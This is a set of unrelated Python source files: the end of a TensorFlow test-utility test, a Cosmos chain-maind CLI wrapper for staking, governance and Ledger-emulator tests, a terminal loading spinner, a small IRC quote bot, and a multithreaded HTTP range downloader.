op = ops.Operation(node_def, ops.get_default_graph(), original_op=op_orig)
raise errors.UnauthenticatedError(node_def, op, "true_err")
def testAssertRaisesOpErrorDoesNotPassMessageDueToLeakedStack(self):
with self.assertRaises(AssertionError):
self._WeMustGoDeeper("this_is_not_the_error_you_are_looking_for")
self._WeMustGoDeeper("true_err")
self._WeMustGoDeeper("name")
self._WeMustGoDeeper("orig")
def testAllCloseScalars(self):
self.assertAllClose(7, 7 + 1e-8)
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(7, 8)
def testArrayNear(self):
a = [1, 2]
b = [1, 2, 5]
with self.assertRaises(AssertionError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [[1, 2], [3, 4]]
with self.assertRaises(TypeError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [1, 2]
self.assertArrayNear(a, b, 0.001)
def testForceGPU(self):
with self.assertRaisesRegexp(errors.InvalidArgumentError,
"Cannot assign a device to node"):
with self.test_session(force_gpu=True):
# this relies on us not having a GPU implementation for assert, which
# seems sensible
x = constant_op.constant(True)
y = [15]
control_flow_ops.Assert(x, y).run()
def testAssertAllCloseAccordingToType(self):
# test float64
self.assertAllCloseAccordingToType(
np.asarray([1e-8], dtype=np.float64),
np.asarray([2e-8], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float64),
np.asarray([2e-7], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
# test float32
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float32),
np.asarray([2e-7], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-6], dtype=np.float32),
np.asarray([2e-6], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
# test float16
self.assertAllCloseAccordingToType(
np.asarray([1e-4], dtype=np.float16),
np.asarray([2e-4], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-3], dtype=np.float16),
np.asarray([2e-3], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
def testRandomSeed(self):
a = random.randint(1, 1000)
a_np_rand = np.random.rand(1)
with self.test_session():
a_rand = random_ops.random_normal([1]).eval()
# ensure that randomness in multiple testCases is deterministic.
self.setUp()
b = random.randint(1, 1000)
b_np_rand = np.random.rand(1)
with self.test_session():
b_rand = random_ops.random_normal([1]).eval()
self.assertEqual(a, b)
self.assertEqual(a_np_rand, b_np_rand)
self.assertEqual(a_rand, b_rand)
if __name__ == "__main__":
googletest.main()
|
cosmoscli.py
|
import enum
import hashlib
import json
import tempfile
import threading
import time
import bech32
from dateutil.parser import isoparse
from .app import CHAIN
from .ledger import ZEMU_BUTTON_PORT, ZEMU_HOST, LedgerButton
from .utils import build_cli_args_safe, format_doc_string, interact
class ModuleAccount(enum.Enum):
FeeCollector = "fee_collector"
Mint = "mint"
Gov = "gov"
Distribution = "distribution"
BondedPool = "bonded_tokens_pool"
NotBondedPool = "not_bonded_tokens_pool"
IBCTransfer = "transfer"
@format_doc_string(
options=",".join(v.value for v in ModuleAccount.__members__.values())
)
def module_address(name):
"""
get address of module accounts
:param name: name of module account, values: {options}
"""
data = hashlib.sha256(ModuleAccount(name).value.encode()).digest()[:20]
return bech32.bech32_encode("cro", bech32.convertbits(data, 8, 5))
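# Illustrative note (not from the original source): module_address("gov") returns the
# bech32 "cro1..." address derived from the first 20 bytes of sha256(b"gov").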
class ChainCommand:
def __init__(self, cmd=None):
self.cmd = cmd or CHAIN
def __call__(self, cmd, *args, stdin=None, **kwargs):
"execute chain-maind"
args = " ".join(build_cli_args_safe(cmd, *args, **kwargs))
return interact(f"{self.cmd} {args}", input=stdin)
class CosmosCLI:
"the apis to interact with wallet and blockchain"
def __init__(
self,
data_dir,
node_rpc,
chain_id=None,
cmd=None,
zemu_address=ZEMU_HOST,
zemu_button_port=ZEMU_BUTTON_PORT,
):
self.data_dir = data_dir
if chain_id is None:
self._genesis = json.load(open(self.data_dir / "config" / "genesis.json"))
self.chain_id = self._genesis["chain_id"]
else:
self.chain_id = chain_id
self.node_rpc = node_rpc
self.raw = ChainCommand(cmd)
        self.ledger_button = LedgerButton(zemu_address, zemu_button_port)
self.output = None
self.error = None
def node_id(self):
"get tendermint node id"
output = self.raw("tendermint", "show-node-id", home=self.data_dir)
return output.decode().strip()
def delete_account(self, name):
"delete wallet account in node's keyring"
return self.raw(
"keys",
"delete",
name,
"-y",
"--force",
home=self.data_dir,
output="json",
keyring_backend="test",
)
def create_account(self, name, mnemonic=None):
"create new keypair in node's keyring"
if mnemonic is None:
output = self.raw(
"keys",
"add",
name,
home=self.data_dir,
output="json",
keyring_backend="test",
)
else:
output = self.raw(
"keys",
"add",
name,
"--recover",
home=self.data_dir,
output="json",
keyring_backend="test",
stdin=mnemonic.encode() + b"\n",
)
return json.loads(output)
def create_account_ledger(self, name):
"create new ledger keypair"
def send_request():
try:
self.output = self.raw(
"keys",
"add",
name,
"--ledger",
home=self.data_dir,
output="json",
keyring_backend="test",
)
except Exception as e:
self.error = e
t = threading.Thread(target=send_request)
t.start()
time.sleep(3)
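        # Step through the Ledger confirmation screens, then press both buttons to approve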
for _ in range(0, 3):
            self.ledger_button.press_right()
            time.sleep(0.2)
        self.ledger_button.press_both()
t.join()
if self.error:
raise self.error
return json.loads(self.output)
def init(self, moniker):
"the node's config is already added"
return self.raw(
"init",
moniker,
chain_id=self.chain_id,
home=self.data_dir,
)
def validate_genesis(self):
return self.raw("validate-genesis", home=self.data_dir)
def add_genesis_account(self, addr, coins, **kwargs):
return self.raw(
"add-genesis-account",
addr,
coins,
home=self.data_dir,
output="json",
**kwargs,
)
def gentx(self, name, coins, min_self_delegation=1, pubkey=None):
return self.raw(
"gentx",
name,
coins,
min_self_delegation=str(min_self_delegation),
home=self.data_dir,
chain_id=self.chain_id,
keyring_backend="test",
pubkey=pubkey,
)
def collect_gentxs(self, gentx_dir):
return self.raw("collect-gentxs", gentx_dir, home=self.data_dir)
def status(self):
return json.loads(self.raw("status", node=self.node_rpc))
def block_height(self):
return int(self.status()["SyncInfo"]["latest_block_height"])
def block_time(self):
return isoparse(self.status()["SyncInfo"]["latest_block_time"])
def balance(self, addr):
coin = json.loads(
self.raw(
"query", "bank", "balances", addr, output="json", node=self.node_rpc
)
)["balances"]
if len(coin) == 0:
return 0
coin = coin[0]
return int(coin["amount"])
def distribution_commission(self, addr):
coin = json.loads(
self.raw(
"query",
"distribution",
"commission",
addr,
output="json",
node=self.node_rpc,
)
)["commission"][0]
return float(coin["amount"])
def distribution_community(self):
coin = json.loads(
self.raw(
"query",
"distribution",
"community-pool",
output="json",
node=self.node_rpc,
)
)["pool"][0]
return float(coin["amount"])
def distribution_reward(self, delegator_addr):
coin = json.loads(
self.raw(
"query",
"distribution",
"rewards",
delegator_addr,
output="json",
node=self.node_rpc,
)
)["total"][0]
return float(coin["amount"])
def address(self, name, bech="acc"):
output = self.raw(
"keys",
"show",
name,
"-a",
home=self.data_dir,
keyring_backend="test",
bech=bech,
)
return output.strip().decode()
def account(self, addr):
return json.loads(
self.raw(
"query", "auth", "account", addr, output="json", node=self.node_rpc
)
)
def supply(self, supply_type):
return json.loads(
self.raw("query", "supply", supply_type, output="json", node=self.node_rpc)
)
def validator(self, addr):
return json.loads(
self.raw(
"query",
"staking",
"validator",
addr,
output="json",
node=self.node_rpc,
)
)
def validators(self):
return json.loads(
self.raw(
"query", "staking", "validators", output="json", node=self.node_rpc
)
)["validators"]
def staking_params(self):
return json.loads(
self.raw("query", "staking", "params", output="json", node=self.node_rpc)
)
def staking_pool(self, bonded=True):
return int(
json.loads(
self.raw("query", "staking", "pool", output="json", node=self.node_rpc)
)["bonded_tokens" if bonded else "not_bonded_tokens"]
)
def transfer(self, from_, to, coins, generate_only=False, fees=None):
return json.loads(
self.raw(
"tx",
"bank",
"send",
from_,
to,
coins,
"-y",
"--generate-only" if generate_only else None,
home=self.data_dir,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
fees=fees,
)
)
def transfer_from_ledger(self, from_, to, coins, generate_only=False, fees=None):
def send_request():
try:
self.output = self.raw(
"tx",
"bank",
"send",
from_,
to,
coins,
"-y",
"--generate-only" if generate_only else "",
"--ledger",
home=self.data_dir,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
fees=fees,
sign_mode="amino-json",
)
except Exception as e:
self.error = e
t = threading.Thread(target=send_request)
t.start()
time.sleep(3)
for _ in range(0, 11):
            self.ledger_button.press_right()
            time.sleep(0.4)
        self.ledger_button.press_both()
t.join()
if self.error:
raise self.error
return json.loads(self.output)
def get_delegated_amount(self, which_addr):
return json.loads(
self.raw(
"query",
"staking",
"delegations",
which_addr,
home=self.data_dir,
chain_id=self.chain_id,
node=self.node_rpc,
output="json",
)
)
def delegate_amount(self, to_addr, amount, from_addr):
return json.loads(
self.raw(
"tx",
"staking",
"delegate",
to_addr,
amount,
"-y",
home=self.data_dir,
from_=from_addr,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
)
)
    # to_addr: crocncl1... , from_addr: cro1...
def unbond_amount(self, to_addr, amount, from_addr):
return json.loads(
self.raw(
"tx",
"staking",
"unbond",
to_addr,
amount,
"-y",
home=self.data_dir,
from_=from_addr,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
)
)
    # to_validator_addr: crocncl1... , from_validator_addr: crocncl1...
def redelegate_amount(
self, to_validator_addr, from_validator_addr, amount, from_addr
):
return json.loads(
self.raw(
"tx",
"staking",
"redelegate",
from_validator_addr,
to_validator_addr,
amount,
"-y",
home=self.data_dir,
from_=from_addr,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
)
)
# from_delegator can be account name or address
def withdraw_all_rewards(self, from_delegator):
return json.loads(
self.raw(
"tx",
"distribution",
"withdraw-all-rewards",
"-y",
from_=from_delegator,
home=self.data_dir,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
)
)
def make_multisig(self, name, signer1, signer2):
self.raw(
"keys",
"add",
name,
multisig=f"{signer1},{signer2}",
multisig_threshold="2",
home=self.data_dir,
keyring_backend="test",
output="json",
)
def sign_multisig_tx(self, tx_file, multi_addr, signer_name):
return json.loads(
self.raw(
"tx",
"sign",
tx_file,
from_=signer_name,
multisig=multi_addr,
home=self.data_dir,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
)
)
def encode_signed_tx(self, signed_tx):
return self.raw(
"tx",
"encode",
signed_tx,
)
def sign_single_tx(self, tx_file, signer_name):
return json.loads(
self.raw(
"tx",
"sign",
tx_file,
from_=signer_name,
home=self.data_dir,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
)
)
def combine_multisig_tx(self, tx_file, multi_name, signer1_file, signer2_file):
return json.loads(
self.raw(
"tx",
"multisign",
tx_file,
multi_name,
signer1_file,
signer2_file,
home=self.data_dir,
keyring_backend="test",
chain_id=self.chain_id,
node=self.node_rpc,
)
)
def broadcast_tx(self, tx_file):
return json.loads(self.raw("tx", "broadcast", tx_file, node=self.node_rpc))
def unjail(self, addr):
return json.loads(
self.raw(
"tx",
"slashing",
"unjail",
"-y",
from_=addr,
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
)
)
def create_validator(
self,
amount,
moniker=None,
commission_max_change_rate="0.01",
commission_rate="0.1",
commission_max_rate="0.2",
min_self_delegation="1",
identity="",
website="",
security_contact="",
details="",
):
"""MsgCreateValidator
        create the node with create_node before calling this"""
pubkey = (
self.raw(
"tendermint",
"show-validator",
home=self.data_dir,
)
.strip()
.decode()
)
return json.loads(
self.raw(
"tx",
"staking",
"create-validator",
"-y",
from_=self.address("validator"),
amount=amount,
pubkey=pubkey,
min_self_delegation=min_self_delegation,
                # commission
commission_rate=commission_rate,
commission_max_rate=commission_max_rate,
commission_max_change_rate=commission_max_change_rate,
# description
moniker=moniker,
identity=identity,
website=website,
security_contact=security_contact,
details=details,
# basic
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
)
)
def edit_validator(
self,
commission_rate=None,
moniker=None,
identity=None,
website=None,
security_contact=None,
details=None,
):
"""MsgEditValidator"""
options = dict(
commission_rate=commission_rate,
# description
moniker=moniker,
identity=identity,
website=website,
security_contact=security_contact,
details=details,
)
return json.loads(
self.raw(
"tx",
"staking",
"edit-validator",
"-y",
from_=self.address("validator"),
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
**{k: v for k, v in options.items() if v is not None},
)
)
def gov_propose(self, proposer, kind, proposal):
if kind == "software-upgrade":
return json.loads(
self.raw(
"tx",
"gov",
"submit-proposal",
kind,
proposal["name"],
"-y",
from_=proposer,
# content
title=proposal.get("title"),
description=proposal.get("description"),
upgrade_height=proposal.get("upgrade-height"),
upgrade_time=proposal.get("upgrade-time"),
upgrade_info=proposal.get("upgrade-info"),
deposit=proposal.get("deposit"),
# basic
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
)
)
elif kind == "cancel-software-upgrade":
return json.loads(
self.raw(
"tx",
"gov",
"submit-proposal",
kind,
"-y",
from_=proposer,
# content
title=proposal.get("title"),
description=proposal.get("description"),
deposit=proposal.get("deposit"),
# basic
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
)
)
else:
with tempfile.NamedTemporaryFile("w") as fp:
json.dump(proposal, fp)
fp.flush()
return json.loads(
self.raw(
"tx",
"gov",
"submit-proposal",
kind,
fp.name,
"-y",
from_=proposer,
# basic
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
)
)
def gov_vote(self, voter, proposal_id, option):
print(voter)
print(proposal_id)
print(option)
return json.loads(
self.raw(
"tx",
"gov",
"vote",
proposal_id,
option,
"-y",
from_=voter,
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
)
)
def gov_deposit(self, depositor, proposal_id, amount):
return json.loads(
self.raw(
"tx",
"gov",
"deposit",
proposal_id,
amount,
"-y",
from_=depositor,
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
)
)
def query_proposals(self, depositor=None, limit=None, status=None, voter=None):
return json.loads(
self.raw(
"query",
"gov",
"proposals",
depositor=depositor,
count_total=limit,
status=status,
voter=voter,
output="json",
node=self.node_rpc,
)
)
def query_proposal(self, proposal_id):
return json.loads(
self.raw(
"query",
"gov",
"proposal",
proposal_id,
output="json",
node=self.node_rpc,
)
)
def query_tally(self, proposal_id):
return json.loads(
self.raw(
"query",
"gov",
"tally",
proposal_id,
output="json",
node=self.node_rpc,
)
)
def ibc_transfer(
self,
from_,
to,
amount,
channel, # src channel
target_version, # chain version number of target chain
i=0,
):
return json.loads(
self.raw(
"tx",
"ibc-transfer",
"transfer",
"transfer", # src port
channel,
to,
amount,
"-y",
# FIXME https://github.com/cosmos/cosmos-sdk/issues/8059
"--absolute-timeouts",
from_=from_,
home=self.data_dir,
node=self.node_rpc,
keyring_backend="test",
chain_id=self.chain_id,
packet_timeout_height=f"{target_version}-10000000000",
packet_timeout_timestamp=0,
)
)
def export(self):
return self.raw("export", home=self.data_dir)
def unsaferesetall(self):
return self.raw("unsafe-reset-all")
def create_plan(self, owner, title, description, price, cron_spec, duration_secs):
return json.loads(
self.raw(
"tx",
"subscription",
"create-plan",
"-y",
from_=owner,
title=title,
description=description,
price=price,
cron_spec=cron_spec,
duration_secs=duration_secs,
chain_id=self.chain_id,
home=self.data_dir,
keyring_backend="test",
node=self.node_rpc,
)
)
def query_plans(self):
return json.loads(
self.raw(
"query", "subscription", "plans", output="json", node=self.node_rpc
)
)["plans"]
def query_plan(self, plan_id):
return json.loads(
self.raw(
"query",
"subscription",
"plan",
plan_id,
output="json",
node=self.node_rpc,
)
)
def create_subscription(self, plan_id, subscriber):
return json.loads(
self.raw(
"tx",
"subscription",
"subscribe",
"-y",
plan_id=plan_id,
from_=subscriber,
chain_id=self.chain_id,
home=self.data_dir,
keyring_backend="test",
node=self.node_rpc,
)
)
def query_subscription(self, subscription_id):
return json.loads(
self.raw(
"query",
"subscription",
"subscription",
subscription_id,
output="json",
node=self.node_rpc,
)
)
|
loading.py
|
"""Context manager for pretty terminal loading bars
"""
# %% stdlib
from itertools import cycle
from shutil import get_terminal_size
from threading import Thread
from time import sleep
# %% Context Manager
class Loader:
def __init__(self, desc="Loading...", end="Done!", timeout=0.5):
"""
A loader-like context manager
Args:
desc (str, optional): The loader's description. Defaults to "Loading...".
end (str, optional): Final print. Defaults to "Done!".
            timeout (float, optional): Sleep time between prints. Defaults to 0.5.
"""
self.desc = desc
self.end = end
self.timeout = timeout
self._thread = Thread(target=self._animate, daemon=True)
self.steps = ["⢿", "⣻", "⣽", "⣾", "⣷", "⣯", "⣟", "⡿"]
self.done = False
def start(self):
self._thread.start()
return self
def _animate(self):
for c in cycle(self.steps):
if self.done:
break
print(f"\r{self.desc} {c}", flush=True, end="")
sleep(self.timeout)
def __enter__(self):
self.start()
def stop(self):
self.done = True
cols = get_terminal_size((80, 20)).columns
print("\r" + " " * cols, end="", flush=True)
print(f"\r{self.end}", flush=True)
def __exit__(self, exc_type, exc_value, tb):
# handle exceptions with those variables ^
self.stop()
if __name__ == "__main__":
with Loader("Loading with context manager..."):
for i in range(10):
sleep(0.25)
loader = Loader("Loading with object...", "That was fast!", 0.05).start()
for i in range(10):
sleep(0.25)
loader.stop()
|
dircbot.py
|
#!/usr/bin/env python3.4
# dircbot 0.1 - a Python IRC bot
# by Duy Nguyen
# import system modules
import random
import socket
import sys
import time
import threading
# import my own modules in modules/ subfolder
import modules.quote as quote
import modules.misc as misc
import modules.pingpong as pingpong
# configuration
# all string configuration must be set with a "b" prefix (typecasting variables
# as bytes in order for Python to communicate with server through sockets)
# bot's nickname
nickname = b"dircbot"
# server, port and socket buffer size
#
# irc server address and port
# 6667 is the default insecure irc port of all popular irc servers
server = b"irc.freenode.net"
port = 6667
# buffer size
# from Python socket documentation: "the value of bufsize should be a
# relatively small power of 2, for example, 4096"
# so you can leave buffer_size as it is
buffer_size = 4096
# channel to join
channel = b"##py_irc_test4235"
# random quoting configuration
# quote database
filename = "quote.txt"
# minimum and maximum interval between sending each quote (in seconds)
min_interval = 20
max_interval = 40
# debug mode
debug = True
# seed the rng with the system's current time for random quoting later on
random.seed()
# create an internet socket and connect to the IRC server
irc = socket.socket()
irc.connect((server, port))
def main():
# authorize with server
# send bot's nickname
irc.send(b"NICK " + nickname + b"\r\n")
# send bot's identification using the USER command
# RFC 2812 compliant
irc.send(b"USER dirc 0 * :dircbot\r\n")
# join the predefined channel
irc.send(b"JOIN " + channel + b"\r\n")
print("dircbot 0.1 running. Press Ctrl+C to stop.")
# loop for as long as the connection is alive
while True:
# initialize a buffer for socket data stream
buffer_data = irc.recv(buffer_size)
if debug == True: # print buffer data if debug mode is on
print(buffer_data)
else:
pass
# rudimentary chat parsing, should be reworked sometime in the future
# as this has a lot of drawbacks
# keep-alive ping, greeting and about commands
# respond to server's PING command to keep connection alive
if buffer_data.find(b"PING") != -1:
misc.ping(irc, buffer_data)
        # when a user joins the channel, the buffer stream will receive
# a JOIN command. if a JOIN is found, send out a greeting
if buffer_data.find(b"JOIN") != -1:
misc.greet(irc, channel)
# when users type !about into chat, reply with version information
if buffer_data.find(b":!about\r\n") != -1:
misc.about(irc, channel)
# ping-pong feature
# if users send a "ping" message, reply with "pong"
# there is distinction between lower and uppercase "ping"
if buffer_data.find(b":ping\r\n") != -1:
pingpong.pingpong(irc, channel, False)
elif buffer_data.find(b":PING\r\n") != -1:
pingpong.pingpong(irc, channel, True)
def quoting(socket, channel, filename):
while True:
# randomize the interval between quotations
interval = random.randint(min_interval, max_interval)
# sleep for that amount of time
time.sleep(interval)
# send a random quote from <filename>
# text file MUST be in utf-8 encoding, or it will mess with
# the display of international characters in chat
quote.quote(socket, channel, filename)
# showtime
def run():
try:
# 2 threads running concurrently to prevent I/O or
# timer blocking misc functions
# main thread that parses IRC stream for chat commands
threading.Thread(target=main).start()
# another thread runs concurrently to provide quotations
threading.Thread(target=quoting, args=(irc, channel, filename)).start()
# handling SIGINT or EOF gracefully
# quit the channel, close socket and exit the program
    except (KeyboardInterrupt, EOFError):
misc.quit(irc, channel)
irc.close()
print("Bot terminated.")
sys.exit()
run()
|
downloader.py
|
import os
import time
import shutil
import threading
import requests
import retry
from config import TEMP_FOLDER
# Multithreaded download
# From https://www.cnblogs.com/weiyinfu/p/8126063.html
# Modified by @JiangGua
def multithread_download(url, path, debug=False):
    PER_THREAD_MIN = 2000  # minimum number of bytes each thread downloads
    MAX_THREAD_COUNT = 50  # maximum number of threads
begTime = time.time()
resp = requests.get(url, stream=True)
sz = int(resp.headers['Content-Length'])
block_sz = max(sz // MAX_THREAD_COUNT, PER_THREAD_MIN)
task = []
cnt = 0
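    # Build one download task per byte range: block_sz bytes each, with the final
    # range extended to absorb a remainder smaller than PER_THREAD_MIN.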
for i in range(0, sz, block_sz):
now_sz = sz - i if sz - i - block_sz < PER_THREAD_MIN else block_sz
it = {
'beg': i,
'end': i + now_sz,
'path': os.path.join(TEMP_FOLDER, str(cnt)),
'last': i + now_sz == sz
}
task.append(it)
cnt += 1
if it['last']:
break
lock = threading.Lock()
def merge():
with open(path, "wb") as f:
for j, i in enumerate(task):
with open(i['path'], 'rb') as ff:
f.write(ff.read(i['end'] - i['beg']))
endTime = time.time()
if debug:
print(endTime - begTime)
@retry.retry(tries=100)
def go(it):
nonlocal cnt
if debug:
print(it)
resp = requests.get(url, headers={
'Range': "bytes=%d-%d" % (it['beg'], it['end'] - 1)
})
if resp.status_code not in [200, 206]:
if debug:
                print(it, resp.status_code, 'unexpected server response')
            raise Exception("unexpected server response")
if len(resp.content) != it['end'] - it['beg']:
if debug:
print("文件切片长度不正确")
raise Exception("文件切片长度不正确")
with open(it['path'], 'wb') as f:
f.write(resp.content)
if debug:
print(it, it['end'] - it['beg'], len(resp.content), 'over', resp.status_code)
        lock.acquire()  # block until acquired; a zero timeout could skip acquisition and break the release below
cnt -= 1
if cnt == 0:
merge()
lock.release()
def start_threading():
threads = []
for i in task:
threads.append(threading.Thread(target=go, args=(i,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
start_threading()
if __name__ == "__main__":
if not os.path.exists(TEMP_FOLDER):
os.mkdir(TEMP_FOLDER)
multithread_download('https://csdnimg.cn/public/common/toolbar/images/csdnqr@2x.png', '下载/a.png', debug=True)
shutil.rmtree(TEMP_FOLDER)
|